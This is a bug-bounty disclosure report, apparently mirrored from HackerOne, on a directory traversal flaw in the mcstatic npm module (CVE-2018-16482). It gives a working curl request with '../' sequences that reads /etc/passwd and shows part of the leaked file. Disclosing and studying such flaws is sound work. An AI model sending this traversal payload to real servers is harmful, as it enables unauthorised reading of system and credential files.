Lucene search
TungpunH1:330285HistoryMar 27, 2018 - 9:25 a.m.
Node.js third-party modules: [mcstatic] Server Directory Traversal
2018-03-2709:25:33
tungpun
hackerone.com
31
0.002 Low
EPSS
Percentile
64.7%
I would like to report a Server Directory Traversal in mcstatic.
It allows reading local files on the target server.
Module
module name: mcstaticversion:0.0.20npm page: https://www.npmjs.com/package/mcstatic
Module Description
Static Http server for mocking and stuff
Vulnerability
Steps To Reproduce:
- Install the module
$ npm i mcstatic
- Start the server
$ ./node_modules/mcstatic/bin/mcstatic --port 6060
- Using the below request to access the file
/etc/passwdon the target server:
$ curl --path-as-is 'http://127.0.0.1:6060/../../../../../../../../../etc/passwd'
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
...
Supporting Material/References:
- node v8.10.0
- npm 5.6.0
- curl 7.54.0
Wrap up
- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N
Impact
reading local files on the target server
Related
cvelist
cvelist
CVE-2018-16482
2019-02-01 18:00:00
nvd
nvd
CVE-2018-16482
2019-02-01 18:29:00
osv
osv
mcstatic directory traversal vulnerability
2019-02-07 18:15:44
github
github
mcstatic directory traversal vulnerability
2019-02-07 18:15:44
cve
cve
CVE-2018-16482
2019-02-01 18:29:00
veracode
veracode
Directory Traversal
2019-02-04 02:25:20
prion
prion
Directory traversal
2019-02-01 18:29:00